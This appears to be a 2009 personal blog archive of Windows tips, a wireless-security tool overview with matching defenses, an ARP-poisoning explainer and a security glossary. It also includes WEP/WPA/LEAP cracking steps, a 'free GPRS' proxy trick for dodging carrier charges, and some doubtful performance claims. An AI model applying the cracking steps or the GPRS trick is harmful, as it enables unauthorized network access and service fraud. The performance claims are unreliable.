Friday, May 8, 2009

WHAT'S LOVE?

Love is a thing shared by twoLove is what you feel for me and youLove is precious when its sharedLove is danger when its daredLove wanders and searches for the oneLove plays and just do it for funLove lets you hear love songs to emoteLove lets you make sweet poems & a quoteLove makes the world go aroundLove makes us happy if the one we loveis finally foundLove turns the world upside downLove cheers us never with a frownLove makes you cryLove sacrifices and says goodbyeLove has its own reason and timeLove can make someone you love "mine"Love makes a person kissLove makes a person missLove is experienced by allLove conquers when you fall.

Wednesday, May 6, 2009

wireless packet sniffer

The rapid proliferation of wireless technology requires new tools for professionals who deal with the deployment, maintenance, and security of WLANs. Meeting this need, TamoSoft introduces CommView for WiFi, a powerful wireless packet sniffer, network monitor, and protocol analyzer designed for WLAN administrators, security professionals, network programmers ... virtually anyone who wants a full picture of the 802.11 a/b/g/n traffic.
Loaded with many user-friendly features, CommView for WiFi combines performance and flexibility with an ease of use unmatched in the industry. This application captures every packet on the air to display important information such as the list of access points and stations, per-node and per-channel statistics, signal strength, a list of packets and network connections, protocol distribution charts, etc. By providing this information, CommView for WiFi can help you view and examine packets, pinpoint network problems, and troubleshoot software and hardware.
You can specify WEP or WPA-PSK keys to decrypt encrypted packets, reconstruct TCP sessions, or create alarms that can notify you about important events.
CommView for WiFi requires Windows 2000/XP/2003/Vista and a compatible wireless adapter. The list compatible adapter can be found by clicking on the hyperlink below:
Click here to download CommView for WiFi now!
More Screen Shots
Other CommView for WiFi features include: Traffic Reports Generate customizable reports in HTML (including images of charts and graphs) or comma-delimited text formats in real time. Logging and Data ExchangeImport and export packets in Sniffer®, EtherPeek™, AiroPeek™, Observer®, NetMon, Tcpdump, hex, and text formats, or exchange data with your application over TCP/IP. Packet GeneratorCreate, customize, and send your own wireless packets through your adapter to test firewalls, intrusion detection systems, or protocol compliance. And much more!
To take full advantage of the product's features, click here to order now!
CommView for WiFi is brought to you by TamoSoft. TamoSoft develops cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware in both wired and wireless networks.

See Dan Hoffman Hack a Blackberry LIVE

Finding Wireless Networks
Locating a wireless network is the first step in trying to exploit it. There are two tools that are commonly used in this regard:
Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.
(NetStumbler Screenshot)
Kismet – One of the key functional elements missing from NetStumbler is the ability to display Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you should realize that Access Points are routinely broadcasting this info; it just isn’t being read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical in finding wireless networks.
(Kismet Screenshot)
Attaching to the Found Wireless Network
Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t using any type of authentication or encryption security, you can simply connect to the SSID. If the SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network is using authentication and/or encryption, you may need one of the following tools.
Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional tools and strategies that can be used to force the generation of traffic on the wireless network to shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.
(Screenshot of Airsnort in Action)
CowPatty – This tool is used as a brute force tool for cracking WPA-PSK, considered the “New WEP” for home Wireless Security. This program simply tries a bunch of different options from a dictionary file to see if one ends up matching what is defined as the Pre-Shared Key.
(Cowpatty Options Screenshot)
ASLeap – If a network is using LEAP, this tool can be used to gather the authentication data that is being passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the authentication like other “real” EAP types, which is the main reason why LEAP can be broken.
(Asleap Options Screenshot)
Sniffing Wireless Data
Whether you are directly connected to a wireless network or not, if there is wireless network in range, there is data flying through the air at any given moment. You will need a tool to be able to see this data.
Wireshark (formerly Ethereal) – While there has been much debate on the proper way to pronounce this utility, there is no question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.
(Screenshot of Ethereal in Action)
(Yahoo IM Session being sniffed in Ethereal)
The aforementioned utilities, or similar ones, will be necessities in your own wireless security toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab environment. And cost is no excuse as all of these tools are available freely on the Internet.
Protecting Against These Tools
Just as it’s important to know how to utilize the aforementioned tools, it is important to know best practices on how to secure your Wireless Network Against these tools.
NetStumbler – Do not broadcast your SSID. Ensure your WLAN is protected by using advanced Authentication and Encryption.
Kismet – There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure your WLAN is protected by using advanced Authentication and Encryption
Airsnort – Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software update).
Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a chance of residing in a dictionary file that would be used to try and guess your key and/or would take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to protect the authentication and limit the amount of incorrect guesses that would take place before the account is locked-out. If using certificate-like functionality, it could also validate the remote system trying to gain access to the WLAN and not allow a rogue system access.
ASLeap – Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP type.
Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break. WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine through an encrypted tunnel that would be encrypted with DES, 3DES or AES.
Questions or comments can be sent to Daniel V. Hoffman, CISSP, CWNA
' );
//-->\n
b_akash@rocketmail.com
' );
//-->

This e-mail address is being protected from spam bots, you need JavaScript enabled to view it
' );
//-->

Prevent Access To USB Pen Drive - working and construction

This program actually consist of two parts. i.e1) Visual Basic Part2) and a batch file
Visual Basic Part:

Create form as show in the figure.CODE:Private Sub Command1_Click()If Option1.Value = True ThenShell (”c:\man.bat 4″)ElseIf Option2.Value = True Then
Shell (”c:\man.bat 3″)End IfEnd Sub
Batch Program:
Create a text file and rename to man.bat and place it in C drivethe file will contain the following code:
@echo offecho Windows Registry Editor Version 5.00 >> c:\man.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor] >> c:\man.regecho “start”=dword:00000%1 >>c:\man.regregedit.exe /s c:\man.regexit
WORKING:
when the user select option1(enable) and clicks the command 1 button the batch file will executed with %1 as 4(the batch file replace %1 with “4″) and then change the value of start in “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor” to “4”the same when we select disable option.
NOTE: You can also use visual basic to write a batch file automatically, to automate the process.

Free IDEA GPRS Hack/Trick - Working in some states

There are number of free airtel gprs tricks available but very few are available for idea or Vodafone. So here I m presenting another idea trick for free gprs and internet on your mobile phone. But as I always say these tricks don’t work for a long time as the service providers are now using better tracking systems and hence they block the proxies as soon as they come across them. So try this out and enjoy free idea gprs if it works for you.
One more thing that I will like to tell you all is that even the proxies are also area specific, so if you can’t run free gprs, you should try searching for new proxies. Before you get this trick working you must ensure the following criteria:
1. You balance must be between Rs.15 to Rs.20.2. Send the activation message only once.3. Always use proxy servers for opening any site.4. For using internet from pc or laptop take care that you use smart browser to surf internet.
[ad#ad-1]
To get this trick working you must follow the steps given below:1. If you have any gprs plan activated already, then you should deactivate it.2. The next thing you need to do is to reactivate zero rental internet.3. After 1 day of activation, send another message GP15 to 4444.4. After 1 day of sending the second message you will have access to free idea gprs.

Increase your RAM and so system speed

1). Start any application, say Word. Open some large documents.
2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.

3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.

5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.

In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.

Disable CD Autorun, simple computer tweak

This trick involves only three simple steps:
1) Click Start, Run and enter GPEDIT.MSC
2) Go to Computer Configuration, Administrative Templates, System.
3) Locate the entry for Turn autoplay off and modify it as you desire.

How to Shutdown XP Faster??

Like previous versions of windows, it takes long time to restart or shutdown windowsXP when the "Exit Windows" sound is enabled. To solve this problem you must disable this useless sound.
•Click Start button.
•Go to settings > Control Panel > Sound, Speech and Audio devices > Sounds and AudioDevices > Sounds.
•Then under program events and windows menu click on "Exit Windows" sub-menu andhighlight it. Now from sounds you can select, choose "none" and then click Apply andOK.
Now you should see some improvements when shutting down your system.

Win XP Won't Completely Shutdown

Go to Control Panel, then go to Power Options.•Click on the APM tab, then check the "Enable Advanced Power Management support."•Shut down your PC.It should now successfully complete the Shut Down process.

Turn off all system beeps

If you want to turn off all system beeps (like the ones that go through your computers' internal speaker):
Start Regedit
Go to HKEY_CURRENT_USER\Control Panel\Sound
Edit the key Beep and give it a value of No

All keyboard Shortcuts Windows Shortcuts

Shift + F10 right-clicks.
Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
Win + Control + F: Open Find dialog. (Computers)
Win + U: Open Utility Manager.
Win + F1: Open Windows help.
Win + Pause: Open System Properties dialog.
Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
Win + Shift + Tab: Cycle through taskbar buttons in reverse.
Alt + Tab: Display Cool Switch. More commonly known as the AltTab dialog.
Alt + Shift + Tab: Display Cool Switch; go in reverse.
Alt + Escape: Send active window to the bottom of the z-order.
Alt + Shift + Escape: Activate the window at the bottom of the z-order.
Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
Shift while a CD is loading: Bypass AutoPlay.
Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
Print screen: Copy screenshot of current screen to clipboard.
Alt + Print screen: Copy screenshot of current active window to clipboard.
Ctrl + Alt + Down Arrow: Invert screen. Untested on OS's other than XP.
Ctrl + Alt + Up Arrow: Undo inversion.
Win + B : Move focus to systray icons.

Ctrl + C or Ctrl + Insert: Copy.
Ctrl + X or Shift + Delete: Cut.
Ctrl + V or Shift + Insert: Paste/Move.
Ctrl + N: New... File, Tab, Entry, etc.
Ctrl + S: Save.
Ctrl + O: Open...
Ctrl + P: Print.
Ctrl + Z: Undo.
Ctrl + A: Select all.
Ctrl + F: Find...
Ctrl+W : to close the current window
Ctrl + F4: Close tab or child window.
F1: Open help.
F11: Toggle full screen mode.
Alt or F10: Activate menu bar.
Alt + Space: Display system menu. Same as clicking the icon on the titlebar.
Escape: Remove focus from current control/menu, or close dialog box.

Tab: Forward one item.
Shift + Tab: Backward one item.
Ctrl + Tab: Cycle through tabs/child windows.
Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
Enter: If a button's selected, click it, otherwise, click default button.
Space: Toggle items such as radio buttons or checkboxes.
Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
Ctrl + Left: Move cursor to the beginning of previous word.
Ctrl + Right: Move cursor to the beginning of next word.
Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in Rich Edit controls.
Ctrl + Down: Move cursor to beginning of next paragraph.
Shift + Left: Highlight one character to the left.
Shift + Right: Highlight one character to the right.
Shift + Up: Highlight from current cursor position, to one line up.
Shift + Down: Highlight from current cursor position, to one line down.
Ctrl + Shift + Left: Highlight to beginning of previous word.
Ctrl + Shift + Right: Highlight to beginning of next word.
Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
Ctrl + Shift + Down: Highlight to beginning of next paragraph.
Home: Move cursor to top of a scrollable control.
End: Move cursor to bottom of a scrollable control.

file browser

Trick To Make Your Firefox Fast

This tricks will improve the speed & load time of firefox. And you will be able to surf faster.

Type about:config in the address bar, Then look for the following entries, and make the corresponding changes.
1network.http.max-connections-per-server =32
2network.http.max-persistent-connections-per-proxy =16
3network.http.max-connections = 64
4network.http.max-persistent-connections-per-server = 10
5network.http.pipelining = true
6network.http.pipelining.maxrequests = 200
7network.http.request.max-start-delay = 0
8network.http.proxy.pipelining = true
9network.http.proxy.version = 1.0

Lastly right-click anywhere and select New- Integer. Name it nglayout.initialpaint.delay and set its value to 0. This value is the amount of time the browser waits before it acts on information it recieves.Enjoy!!

Find who is Invisible on Yahoo messenger

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline, they may in the 'Invisible' mode. This maybe if they are trying to ignore you or are too busy to talk to anyone.
There is this small trick that you can use to find out what the truth is.
Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.After loading the Doodle imvironment there can be two possibilities
1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:

2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below. So you know that the user is online.

Convert FAT- NTFS

To convert a FAT partition to NTFS, perform the following steps.
Click Start, click Programs, and then click Command Prompt. In Windows XP, click Start, click Run, type cmd and then click OK.
At the command prompt, type CONVERT [driveletter]: /FS:NTFS. Convert.exe will attempt to convert the partition to NTFS.

NOTE:=Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command.

SPEEDUP FOLDER BROWSING

You may have noticed that everytime you open my computer to browse folders that there is a slight delay. This is because Windows XP automatically searches for network files and printers everytime you open Windows Explorer. To fix this and to increase browsing significantly:
1. Open My Computer 2. Click on Tools menu 3. Click on Folder Options 4. Click on the View tab. 5. Uncheck the Automatically search for network folders and printers check box 6. Click Apply 7. Click Ok 8. Reboot your computer

DISABLE UNNECESSARY SERVICES

Because Windows XP has to be all things to all people it has many services running that take up system resources that you will never need. Below is a list of services that can be disabled on most machines:
Alerter Clipbook Computer Browser Distributed Link Tracking Client Fast User Switching Help and Support - (If you use Windows Help and Support leave this enabled) Human Interface Access Devices Indexing Service IPSEC Services Messenger Netmeeting Remote Desktop Sharing (disabled for extra security) Portable Media Serial Number Remote Desktop Help Session Manager (disabled for extra security) Remote Procedure Call Locator Remote Registry (disabled for extra security) Remote Registry Service Secondary Logon Routing & Remote Access (disabled for extra security) Server SSDP Discovery Service - (Unplug n' Pray will disable this) Telnet TCP/IP NetBIOS Helper Upload Manager Universal Plug and Play Device Host Windows Time Wireless Zero Configuration (Do not disable if you use a wireless network) Workstation To disable these services:
Go to Start and then Run and type "services.msc" Doubleclick on the service you want to change Change the startup type to 'Disable"

Speed Up Browsing

When you connect to a web site your computer sends information back and forth. Some of this information deals with resolving the site name to an IP address, the stuff that TCP/IP really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although Windows XP and Windows XP have a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]"CacheHashTableBucketSize"=dword:00000001"CacheHashTableSize"=dword:00000180"MaxCacheEntryTtlLimit"=dword:0000fa00"MaxSOACacheEntryTtlLimit"=dword:0000012d
Make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Merge it into the registry.

PC-Maintenance only for my

1. Disk Defrag: It is advisable to run Defrag under Windows 95 once a month or when you add/remove programs. However, under Windows 98, you can run it every week if you want because it has a new engine, which means that the more you run it, the faster your computer will get. What happens is that your programs are placed on your hard disk in a way so that the ones you use most often are easier for the hard disk to find and run. Make sure that the 'make my programs run faster' is ticked in the 'Settings' window in Defrag.

2. Scandisk: Running a thorough check is good once a month in both Windows 95 and 98. Run this once a month if you feel that your hard disk takes a long time to load programs. A standard check is very fast and checks for basic disk problems concerning files and folders and lost fragments. It takes an average 2 minutes to complete so try running it often.


3. Disk cleanup: This one is good for seeing how much disk space is being used up by unnecessary files that are in the recycle bin, temp folder, or in temporary internet folders. You can then remove them!

4. RegClean: A simple but effective piece of software this is. You can download it for free from Microsoft's web site. It is also available on many magazine cover disks. Reg Clean takes about a minute to check the registry. Then it asks whether you want to clean out redundant or orphan file. This usually helps the computer to get rid of files that have been left behind by uninstalled programs.

5. Windows update: It's a good idea to use Windows Update to make sure your computer has all the latest fixes, patches and updates. You can do so by clicking on its icon in the Start Menu under Windows 98.

6. TweakALL: A very handy program that allows to change settings, which cannot be changed using Windows alone!

Folder Options Missing (akash)

Open Run and then type "gpedit.msc".Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.
I hopes that you will find the option after restarting windows.

Tuesday, May 5, 2009

Protect the ARP cache?

The ARP cache keeps track of the MAC addresses of computers you communicate with and what IP address they tie too. On a PC, the only entries that are likely to be there are ones for your gateway and any network printers you have.
What an ARP poisoning attack is usually looking to do is make your computer think a different machine is your gateway than the router you set up. That way, all your traffic (e-mail, banking sites, etc) goes through it before being passed out to the internet. It allows someone to set up a "man-in-the-middle" attack much more simply and to sniff all the information going in and out from your network.

Internet Security Glossary

ARPAnet The precursor to the Internet, ARPAnet was a large wide-area network created by the United States Defense Advanced Research Project Agency (ARPA). Established in 1969, ARPAnet served as a testbed for new networking technologies, linking many universities and research centers. The first two nodes that formed the ARPAnet were UCLA and the Stanford Research Institute, followed shortly thereafter by the University of Utah.attack An action conducted by an adversary, the attacker, on a potential victim. (From the glossary of State of the Practice of Intrusion Detection Technologies.)backdoor Also called a trapdoor. An undocumented way of gaining access to a program, online service or an entire computer system. The backdoor is written by the programmer who creates the code for the program. It is often only known by the programmer. A backdoor is a potential security risk.backup Copy of files and programs made to facilitate recovery, if necessary. (From the National Information Systems Security (INFOSEC) Glossary.)brute force Refers to a programming style that does not include any shortcuts to improve performance, but instead relies on sheer computing power to try all possibilities until the solution to a problem is found. A classic example is the traveling salesman problem (TSP). Suppose a salesman needs to visit 10 cities across the country. How does one determine the order in which cities should be visited such that the total distance traveled is minimized? The brute force solution is simply to calculate the total distance for every possible route and then select the shortest one. This is not particularly efficient because it is possible to eliminate many possible routes through clever algorithms.
Although brute force programming is not particularly elegant, it does have a legitimate place in software engineering. Since brute force methods always return the correct result -- albeit slowly -- they are useful for testing the accuracy of faster algorithms. In addition, sometimes a particular problem can bebug An error or defect in software or hardware that causes a program to malfunction. According to folklore, the first computer bug was an actual bug. Discovered in 1945 at Harvard, a moth trapped between two electrical relays of the Mark II Aiken Relay Calculator caused the whole machine to shut down.cable modem A modem designed to operate over cable TV lines. Because the coaxial cable used by cable TV provides much greater bandwidth than telephone lines, a cable modem can be used to achieve extremely fast access to the World Wide Web. This, combined with the fact that millions of homes are already wired for cable TV, has made the cable modem something of a holy grail for Internet and cable TV companies.
There are a number of technical difficulties, however. One is that the cable TV infrastructure is designed to broadcast TV signals in just one direction - from the cable TV company to people's homes. The Internet, however, is a two-way system where data also needs to flow from the client to the server. In addition, it is still unknown whether the cable TV networks can handle the traffic that would ensue if millions of users began using the system for Internet access.
Despite these problems, cable modems that offer speeds up to 2 Mbps are already available in many areas.DoS Short for denial-of-service attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols. For all known DoS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks. But, like viruses, new DoS attacks are constantly being dreamed up by hackers. download To copy data (usually an entire file) from a main source to a peripheral device. The term is often used to describe the process of copying a file from an online service or bulletin board service (BBS) to one's own computer. Downloading can also refer to copying a file from a network file server to a computer on the network.
In addition, the term is used to describe the process of loading a font into a laser printer. The font is first copied from a disk to the printer's local memory. A font that has been downloaded like this is called a soft font to distinguish it from the hard fonts that are permanently in the printer's memory.
The opposite of download is upload, which means to copy a file from your own computer to another computer.dsl modem Refers collectively to all types of digital subscriber lines, the two main categories being ADSL and SDSL. Two other types of xDSL technologies are High-data-rate DSL (HDSL) and Very high DSL (VDSL).
DSL technologies use sophisticated modulation schemes to pack data onto copper wires. They are sometimes referred to as last-mile technologies because they are used only for connections from a telephone switching station to a home or office, not between switching stations.
xDSL is similar to ISDN inasmuch as both operate over existing copper telephone lines (POTS) and both require the short runs to a central telephone office (usually less than 20,000 feet). However, xDSL offers much higher speeds - up to 32 Mbps for downstream traffic, and from 32 Kbps to over 1 Mbps for upstream traffic.e-commerce Conducting business on-line. This includes, for example, buying and selling products with digital cash and via Electronic Data Interchange (EDI).e-mail Short for electronic mail, the transmission of messages over communications networks. The messages can be notes entered from the keyboard or electronic files stored on disk. Most mainframes, minicomputers, and computer networks have an e-mail system. Some electronic-mail systems are confined to a single computer system or network, but others have gateways to other computer systems, enabling users to send electronic mail anywhere in the world. Companies that are fully computerized make extensive use of e-mail because it is fast, flexible, and reliable.
Most e-mail systems include a rudimentary text editor for composing messages, but many allow you to edit your messages using any editor you want. You then send the message to the recipient by specifying the recipient's address. You can also send the same message to several users at once. This is called broadcasting.
Sent messages are stored in electronic mailboxes until the recipient fetches them. To see if you have any mail, you may have to check your electronic mailbox periodically, although many systems alert you when mail is received. After reading your mail, you can store it in a text file, forward it to other users, or delete it. Copies of memos can be printed out on a printer if you want a paper copy.
All online services and Internet Service Providers (ISPs) offer e-mail, and most also support gateways so that you can exchange mail with users of other systems.
Usually, it takes only a few seconds or minutes for mail to arrive at its destination. This is a particularly effective way to communicate with a group because you can broadcast a message or document to everyone in the group at once.
Although different e-mail systems use different formats, there are some emerging standards that are making it possible for users on all systems to exchange messages. In the PC world, an important e-mail standard is MAPI. The CCITT standards organization has developed the X.400 standard, which attempts to provide a universal way of addressing messages. To date, though, the de facto addressing standard is the one used by the Internet system because almost all e-mail systems have an Internet gateway.
Another common spelling for e-mail is email.encryption The translation of data into a secret code. Encryption is the most effective way to achieve data security. To read an encrypted file, you must have access to a secret key or password that enables you to decrypt it. Unencrypted data is called plain text; encrypted data is referred to as cipher text.
There are two main types of encryption: asymmetric encryption (also called public-key encryption) and symmetric encryption.firewall A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in both hardware and software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.
There are several types of firewall techniques:
Packet filter: Looks at each packet entering or leaving the network and accepts or rejects it based on user-defined rules. Packet filtering is fairly effective and transparent to users, but it is difficult to configure. In addition, it is susceptible to IP spoofing.
Application gateway: Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very effective, but can impose a performance degradation.
Circuit-level gateway: Applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking.
Proxy server: Intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.
In practice, many firewalls use two or more of these techniques in concert.
A firewall is considered a first line of defense in protecting private information. For greater security, data can be encrypted.heuristics Of or relating to exploratory problem-solving techniques that utilize self-educating techniques (as the evaluation of feedback) to improve performance. (From Merriam-Webster Online.)Internet A global network connecting millions of computers. More than 100 countries are linked into exchanges of data, news and opinions.
Unlike online services, which are centrally controlled, the Internet is decentralized by design. Each Internet computer, called a host, is independent. Its operators can choose which Internet services to use and which local services to make available to the global Internet community. Remarkably, this anarchy by design works exceedingly well.
There are a variety of ways to access the Internet. Most online services, such as American Online, offer access to some Internet services. It is also possible to gain access through a commercial Internet Service Provider (ISP).
The Internet is not synonymous with World Wide Web.instant messaging A type of communications service that enables you to create a private chat room with another individual. Typically, the instant messaging system alerts you whenever somebody on your private list is online. You can then initiate a chat session with that particular individual.
There are several competing instant messaging systems. Unfortunately, there's no standard, so anyone you want to send instant messages to must use the same instant messaging system that you use.intruder An adversary who is conducting or has conducted an intrusion or attack against a victim host, site, network or organization. Since the label of intruder is assigned by the victim of the intrusion and is therefore contingent on the victim’s definition of encroachment, there can be no ubiquitous categorization of actions as being intrusive or not. From the victim’s viewpoint, an intruder is usually an entity (person or organization) that has successfully attacked the victim. It is unclear whether one who conducts an unsuccessful attack is an intruder. If an intrusion is required to be an intruder, then it seems that all intruders are attackers, but all attackers are not necessarily intruders. (From the glossary of State of the Practice of Intrusion Detection Technologies.)media Objects on which data can be stored. These include hard disks, floppy disks, CD-ROMs and tapes.operating system The most important program that runs on a computer. Every general-purpose computer must have an operating system to run other programs. Operating systems perform basic tasks, such as recognizing input from the keyboard, sending output to the display screen, keeping track of files and directories on the disk, and controlling peripheral devices such as disk drives and printers.
For large systems, the operating system has even greater responsibilities and powers. It is like a traffic cop -- it makes sure that different programs and users running at the same time do not interfere with each other. The operating system is also responsible for security, ensuring that unauthorized users do not access the system.
Operating systems can be classified as follows:
multi-user: Allows two or more users to run programs at the same time. Some operating systems permit hundreds or even thousands of concurrent users.
multiprocessing: Supports running a program on more than one CPU.
multitasking: Allows more than one program to run concurrently.
multithreading: Allows different parts of a single program to run concurrently.
real time: Responds to input instantly. General-purpose operating systems, such as DOS and UNIX, are not real-time.
Operating systems provide a software platform on top of which other programs, called application programs, can run. The application programs must be written to run on top of a particular operating system. Your choice of operating system, therefore, determines to a great extent the applications you can run. For PCs, the most popular operating systems are DOS, OS/2, and Windows, but others are available, such as Linux.
As a user, you normally interact with the operating system through a set of commands. For example, the DOS operating system contains commands such as COPY and RENAME for copying files and changing the names of files, respectively. The commands are accepted and executed by a part of the operating system called the command processor or command line interpreter. Graphical user interfaces allow you to enter commands by pointing and clicking at objects that appear on the screen.packet A piece of a message transmitted over a packet-switching network. See under packet switching. One of the key features of a packet is that it contains the destination address in addition to the data. In IP networks, packets are often called datagrams.password A secret series of characters that enables a user to access a file, computer, or program. On multi-user systems, each user must enter his or her password before the computer will respond to commands. The password helps ensure that unauthorized users do not access the computer. In addition, data files and programs may require a password.
Ideally, the password should be something that nobody could guess. In practice, most people choose a password that is easy to remember, such as their name or their initials. This is one reason it is relatively easy to break into most computer systems.patch A temporary fix to a program bug. A patch is an actual piece of object code that is inserted into (patched into) an executable program.port In TCP/IP and UDP networks, an endpoint to a logical connection. The port number identifies what type of port it is. For example, port 80 is used for HTTP traffic. Also see Well-Known TCP Port Numbers.smtp Short for Simple Mail Transfer Protocol, a protocol for sending e-mail messages between servers. Most e-mail systems that send mail over the Internet use SMTP to send messages from one server to another; the messages can then be retrieved with an e-mail client. sniffing A program and/or device that monitors data traveling over a network. Sniffers can be used both for legitimate network management functions and for stealing information off a network. Unauthorized sniffers can be extremely dangerous to a network's security because they are virtually impossible to detect and can be inserted almost anywhere. This makes them a favorite weapon in the hacker's arsenal.
On TCP/IP networks, where they sniff packets, they're often called packet sniffers.social engineering Social engineering is the art and science of getting people to comply to your wishes. It is not a way of mind control, it will not allow you to get people to perform tasks wildly outside of their normal behavior and it is far from foolproof. (From http://packetstormsecurity.nl/docs/social-engineering/aaatalk.html )spoofing Unauthorized use of legitimate Identification and Authentication data, however, it was obtained, to mimic a subject different from the attacker. Impersonating, masquerading, piggybacking, and mimicking are forms of spoofing. (From the National Information Systems Security (INFOSEC) Glossary.)stateful inspection Also referred to as dynamic packet filtering. Stateful inspection is a firewall architecture that works at the network layer. Unlike static packet filtering, which examines a packet based on the information in its header, stateful inspection tracks each connection traversing all interfaces of the firewall and makes sure they are valid. An example of a stateful firewall may examine not just the header information but also the contents of the packet up through the application layer in order to determine more about the packet than just information about its source and destination. A stateful inspection firewall also monitors the state of the connection and compiles the information in a state table. Because of this, filtering decisions are based not only on administrator-defined rules (as in static packet filtering) but also on context that has been established by prior packets that have passed through the firewall.
As an added security measure against port scanning, stateful inspection firewalls close off ports until connection to the specific port is requested.
Check Point Software is credited with coining the term stateful inspection in the use of its FireWall-1 in 1993.vulnerability A feature or combination of features of a system that allows an adversary – the intruder – to place the system – your home computer – in a state that is both contrary to the desires of the people responsible for the system – you! – and increases the risk (probability or consequence) of undesirable behavior in or of the system. A feature of combination of features of a system that prevents the successful implementation of a particular security policy for that system. A program with a buffer that can be overflowed with data supplied by the invoker will usually be considered a vulnerability. A telephone procedure that provides private information about the caller without prior authentication will usually be considered to have a vulnerability.worm A program or algorithm that replicates itself over a computer network and usually performs malicious actions, such as using up the computer's resources and possibly shutting the system down. Also see virus.
©2000-2004 by SurferBeware.com™. All rights reserved.

Top 10 Tips to Keep Your Computer Hacker Free

10. Subscribe to our newsletter. It will keep you up-to-date on how to protect yourself from the latest attacks and threats in the Internet world.
9. Test your firewall regularly. Especially after any software updates. Test you Firewall here: Firewall Testing.
